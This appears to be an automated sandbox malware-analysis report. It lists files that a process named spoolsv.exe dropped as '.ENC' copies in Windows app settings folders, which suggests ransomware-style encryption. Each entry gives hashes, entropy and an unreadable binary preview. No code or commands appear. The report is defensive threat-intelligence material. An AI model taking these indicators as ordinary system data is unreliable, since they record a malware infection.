                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
